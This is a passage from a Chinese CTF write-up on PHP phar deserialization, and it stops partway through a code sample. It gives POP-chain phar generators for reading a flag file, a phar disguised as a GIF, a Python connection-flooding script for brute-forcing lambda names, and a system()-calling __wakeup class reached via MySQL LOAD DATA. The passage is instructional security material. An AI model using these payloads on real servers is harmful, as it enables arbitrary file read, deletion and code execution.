<span class="token variable">$db</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">mysqli</span><span class="token punctuation">(</span><span class="token variable">$dbaddr</span><span class="token punctuation">,</span> <span class="token variable">$dbuser</span><span class="token punctuation">,</span> <span class="token variable">$dbpass</span><span class="token punctuation">,</span> <span class="token variable">$dbname</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">class</span> <span class="token class-name">User</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$db</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">global</span> <span class="token variable">$db</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">db</span> <span class="token operator">=</span> <span class="token variable">$db</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">db</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">close</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name">FileList</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">private</span> <span class="token variable">$files</span><span class="token punctuation">;</span>
    <span class="token keyword">private</span> <span class="token variable">$results</span><span class="token punctuation">;</span>
    <span class="token keyword">private</span> <span class="token variable">$funcs</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token variable">$path</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">files</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">results</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">funcs</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$filenames</span> <span class="token operator">=</span> <span class="token function">scandir</span><span class="token punctuation">(</span><span class="token variable">$path</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$key</span> <span class="token operator">=</span> <span class="token function">array_search</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"."</span><span class="token punctuation">,</span> <span class="token variable">$filenames</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">unset</span><span class="token punctuation">(</span><span class="token variable">$filenames</span><span class="token punctuation">[</span><span class="token variable">$key</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$key</span> <span class="token operator">=</span> <span class="token function">array_search</span><span class="token punctuation">(</span><span class="token double-quoted-string string">".."</span><span class="token punctuation">,</span> <span class="token variable">$filenames</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">unset</span><span class="token punctuation">(</span><span class="token variable">$filenames</span><span class="token punctuation">[</span><span class="token variable">$key</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$filenames</span> <span class="token keyword">as</span> <span class="token variable">$filename</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">File</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">open</span><span class="token punctuation">(</span><span class="token variable">$path</span> <span class="token punctuation">.</span> <span class="token variable">$filename</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token function">array_push</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">files</span><span class="token punctuation">,</span> <span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">results</span><span class="token punctuation">[</span><span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">name</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__call</span><span class="token punctuation">(</span><span class="token variable">$func</span><span class="token punctuation">,</span> <span class="token variable">$args</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">array_push</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">funcs</span><span class="token punctuation">,</span> <span class="token variable">$func</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">files</span> <span class="token keyword">as</span> <span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">results</span><span class="token punctuation">[</span><span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">name</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token variable">$func</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token variable">$file</span><span class="token operator">-</span><span class="token operator">></span><span class="token variable">$func</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name">File</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$filename</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">detele</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">unlink</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">filename</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">close</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">return</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">filename</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>这里需要提一下利用条件</p>
<ol>
<li><p>phar文件能够上传至服务器</p>
</li>
<li><p>要有可利用的魔术方法</p>
</li>
<li><p>文件操作函数的参数可控，且:、<code>/</code>、<code>phar</code>等特殊字符没有被过滤</p>
</li>
</ol>
<p>文件上传功能允许上传文件，修改phar文件后缀即可。魔术方法则在delete文件中有<code>unlink()</code>以及<code>file_get_contents()</code>和<code>__call()</code>等，文件操作函数的参数，<code>filename</code>可控，且无过滤。<br>现在捋一下整个逻辑，这里是可以进行任意文件读取，且<code>delete</code>也可以进行任意文件删除(PS:测试将<code>index.php</code>删了，无奈只能重启靶机)，<br>代码逻辑，在<code>class.php</code>中的<code>User</code>类中，有一个<code>close</code>方法，<code>__destruct</code>执行触发该<code>close</code>方法,将该<code>close</code>方法改为<code>FileList</code>的一个对象，且<code>file</code>类中也有一个<code>close</code>方法，它负责是的读取文件<code>file_get_contents()</code>函数。<br>构造pop链的逻辑，读取文件的话，可以使<code>User</code>类中的<code>__construct()</code>实例化一个<code>FileList</code>对象。然后向下执行，<code>FileList</code>中没有<code>close</code>函数，所以就能触发<code>__call()</code>函数，然后再执行<code>close</code>方法（注意此时是File中的<code>close</code>方法）只需控制<code>filename</code>的值即可成功执行<code>file_get_contents()</code>函数进行读取文件。</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name">User</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$db</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">db</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">FileList</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">class</span> <span class="token class-name">FileList</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">private</span> <span class="token variable">$files</span><span class="token punctuation">;</span>
    <span class="token keyword">private</span> <span class="token variable">$results</span><span class="token punctuation">;</span>
    <span class="token keyword">private</span> <span class="token variable">$funcs</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">files</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">File</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">results</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">funcs</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">class</span> <span class="token class-name">File</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'/flag.txt'</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$user</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">User</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
@<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"m0re.phar"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">phar</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'m0re.phar'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//后缀名必须为phar</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">startBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setStub</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"GIF89a&lt;?php __HALT_COMPILER(); ?>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//设置stub</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setMetadata</span><span class="token punctuation">(</span><span class="token variable">$user</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//自定义的meta-data存入manifest</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">addFromString</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"f1ag.txt"</span><span class="token punctuation">,</span><span class="token double-quoted-string string">"f1ag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//添加要压缩的文件</span>
<span class="token comment">//签名自动计算</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">stopBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>
<p>上传并删除抓包，<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730170303.png" loading="lazy"></p>
<h2 id="Baby-h-Master-PHP"><a href="#Baby-h-Master-PHP" class="headerlink" title="Baby^h Master PHP"></a>Baby^h Master PHP</h2><p>这个题目可是很经典的了。<br>直接给出源码，会看到当前目录，在沙盒当中，全局查看代码，两个类<code>Admin&amp;User</code>，且Admin类继承了User类，三个函数，分别为三种功能，<code>upload</code>和<code>show</code>还有<code>check_session</code><br>然后看用户可以控制的输入部分</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token variable">$mode</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"m"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$mode</span> <span class="token operator">==</span> <span class="token double-quoted-string string">"upload"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">upload</span><span class="token punctuation">(</span><span class="token function">check_session</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$mode</span> <span class="token operator">==</span> <span class="token double-quoted-string string">"show"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token function">show</span><span class="token punctuation">(</span><span class="token function">check_session</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">"IP:"</span><span class="token punctuation">.</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"REMOTE_ADDR"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">"Sandbox:"</span><span class="token punctuation">.</span><span class="token double-quoted-string string">"/var/www/data/"</span> <span class="token punctuation">.</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"orange"</span> <span class="token punctuation">.</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"REMOTE_ADDR"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>输入可以有两种模式，一种是upload，一种是show。<br>关于upload函数</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">upload</span><span class="token punctuation">(</span><span class="token variable">$path</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"url"</span><span class="token punctuation">]</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">"/avatar.gif"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">6</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token double-quoted-string string">"GIF89a"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Fuck off"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$path</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">"/avatar.gif"</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Upload OK"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>接受输入的一个URL，并访问，<code>url/avatar.gif</code>然后保存到本地。并且检验该文件是否为GIF，通过的手法是对比判断文件头，看数据中的前六个字母是否符合GIF标志(这个很容易绕过)。<br>而show函数，则是读取上传的文件的功能。<br>还有一个知识点就是匿名函数，关于PHP的匿名函数，介绍是：临时创建一个没有指定名称的函数<br>比如</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$greet</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"Hello %s\r\n"</span><span class="token punctuation">,</span> <span class="token variable">$name</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">;</span>

<span class="token variable">$greet</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'World'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$greet</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'PHP'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
#Hello World
#Hello PHP</code></pre>
<p>题目中的Admin类中就是存在一个这样的匿名函数</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token keyword">class</span> <span class="token class-name">Admin</span> <span class="token keyword">extends</span> <span class="token class-name">User</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$random</span> <span class="token operator">=</span> <span class="token function">bin2hex</span><span class="token punctuation">(</span><span class="token function">openssl_random_pseudo_bytes</span><span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"function my_function_<span class="token interpolation"><span class="token variable">$random</span></span>() &#123;"</span>
            <span class="token punctuation">.</span> <span class="token double-quoted-string string">"  global \$FLAG; \$FLAG();"</span>
            <span class="token punctuation">.</span> <span class="token double-quoted-string string">"&#125;"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"lucky"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>关于<code>bin2hex(openssl_random_pseudo_bytes(32))</code><br>一个函数</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token function">openssl_random_pseudo_bytes</span><span class="token punctuation">(</span> int <span class="token variable">$length</span> <span class="token punctuation">[</span><span class="token punctuation">,</span> bool <span class="token operator">&amp;</span><span class="token variable">$crypto_strong</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span></code></pre>
<p><code>openssl_random_pseudo_bytes</code> - 生成一个伪随机字节串,字节数由 length 参数指定。 通过 crypto_strong 参数可以表示在生成随机字节的过程中是否使用了强加密算法。返回值为FALSE的情况很少见，但已损坏或老化的有些系统上会出现。<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210802234525.png" loading="lazy"><br>bin2hex将生成的随即字节串转换成十六进制。<br>然后分析整个逻辑：由内向外看，<code>upload</code>和<code>show</code>都使用了<code>check_session</code>函数，这个函数，取出<code>cookie</code>中的<code>session-data</code>：</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">O</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A4</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A</span><span class="token operator">%</span><span class="token number">22</span>User<span class="token operator">%</span><span class="token number">22</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A1</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A</span><span class="token operator">%</span><span class="token number">7</span>Bs<span class="token operator">%</span><span class="token number">3</span><span class="token constant">A6</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A</span><span class="token operator">%</span><span class="token number">22</span>avatar<span class="token operator">%</span><span class="token number">22</span><span class="token operator">%</span><span class="token number">3</span>Bs<span class="token operator">%</span><span class="token number">3</span><span class="token constant">A46</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">A</span><span class="token operator">%</span><span class="token number">22</span><span class="token operator">%</span><span class="token number">2</span>Fvar<span class="token operator">%</span><span class="token number">2</span>Fwww<span class="token operator">%</span><span class="token number">2</span>Fdata<span class="token operator">%</span><span class="token number">2</span>F3054b012b7bb1e3093bb723f95a6a055<span class="token operator">%</span><span class="token number">22</span><span class="token operator">%</span><span class="token number">3</span><span class="token constant">B</span><span class="token operator">%</span><span class="token number">7</span><span class="token constant">D</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">-</span><span class="token number">6234845</span>ec46a27cb6535a24307809d88f700d915</code></pre>
<p>其中<code>data</code>为<code>User</code>类序列化的内容，<code>hmac</code>是经过<code>hash_hmac(&quot;sha1&quot;, $data, $SECRET)</code>处理后的，拼接在一起就是<code>session-data</code>然后后面三个if语句则是匹配cookie中的这些数据是否相同，相同就进行反序列化，并且返回它的属性avatar<br>然后就是upload模式，验证url是否存在，如果存在则上传avatar.gif并覆盖。最后执行Admin类中的随机函数，这个随机函数的名字，这里看大佬的解释是查看<code>create_function</code>函数对应的内核源，暂时理解不来。只知道匿名函数并非是没有名字的，而是<code>%00lambda_%d</code>其中<code>%d</code>为数字，为当前进程的第n个匿名函数。<br>然后还有apache2的工作模式，默认是prefork<br>prefork是一个非线程型的、预派生的MPM，使用多个进程，每个进程在某个确定的时间只单独处理一个连接，效率高，但内存使用比较大。<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210803001624.png" loading="lazy"><br>然后就是解题了：<br>先生成Admin类的phar文件</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name">Admin</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$avatar</span><span class="token operator">=</span><span class="token single-quoted-string string">'flag'</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Admin</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$phar</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Phar</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'test.phar'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'test.phar'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">startBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setStub</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'GIF89a&lt;?php __HALT_COMPILER(); ?>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">setMetadata</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">addFromString</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'text.txt'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'test'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$phar</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">stopBuffering</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></code></pre>
<p>重命名为<code>avatar.gif</code>后上传服务器，进行upload操作。<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210803002516.png" loading="lazy"><br>最后进行最后一步爆破匿名函数</p>
<pre class="language-py" data-language="py"><code class="language-py">#fork.py
# coding: UTF-8
# Author: orange@chroot.org
# 

import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def run(i):
    while 1:
        HOST &#x3D; &#39;题目地址&#39;
        PORT &#x3D; 80
        s &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.sendall(&#39;GET &#x2F; HTTP&#x2F;1.1\nHost: your_vps_ip\nConnection: Keep-Alive\n\n&#39;)
        # s.close()
        print &#39;ok&#39;
        time.sleep(0.5)

i &#x3D; 8
pool &#x3D; ThreadPool( i )
result &#x3D; pool.map_async( run, range(i) ).get(0xffff)</code></pre>
<h1 id="0x03-扩展内容"><a href="#0x03-扩展内容" class="headerlink" title="0x03 扩展内容"></a>0x03 扩展内容</h1><h2 id="mysql-反序列化函数-利用phar协议造成php反序列化"><a href="#mysql-反序列化函数-利用phar协议造成php反序列化" class="headerlink" title="mysql 反序列化函数_利用phar协议造成php反序列化"></a>mysql 反序列化函数_利用phar协议造成php反序列化</h2><p>php调用mysql的语句<code>LOAD DATA LOCAL INFILE</code>导入phar文件也能触发phar中的反序列化语句<br><code>LOAD DATA LOCAL INFILE</code>这条语句是批量向表中插入文件中的内容</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">LOAD</span> <span class="token constant">DATA</span> <span class="token constant">LOCAL</span> <span class="token constant">INFILE</span> <span class="token single-quoted-string string">'d:\\phpStudy\\WWW\\m0re\\user.txt'</span> <span class="token constant">INTO</span> <span class="token constant">TABLE</span> users<span class="token punctuation">;</span></code></pre>
<p>前提：在<code>my.ini</code>中添加</p>
<pre class="language-php" data-language="php"><code class="language-php">local<span class="token operator">-</span>infile<span class="token operator">=</span><span class="token number">1</span>
secure_file_priv<span class="token operator">=</span><span class="token double-quoted-string string">""</span></code></pre>
<p><img src="https://gitee.com/m0re/picture/raw/master/img/20210730173455.png" loading="lazy"><br>成功插入<br><img src="https://gitee.com/m0re/picture/raw/master/img/20210730180436.png" loading="lazy"></p>
<p>利用方式</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name">A</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$s</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> __wakeup <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">system</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">s</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$m</span> <span class="token operator">=</span> <span class="token function">mysqli_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">mysqli_options</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">,</span> <span class="token constant">MYSQLI_OPT_LOCAL_INFILE</span><span class="token punctuation">,</span> <span class="token boolean constant">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$s</span> <span class="token operator">=</span> <span class="token function">mysqli_real_connect</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'localhost'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'test'</span><span class="token punctuation">,</span> <span class="token number">3306</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
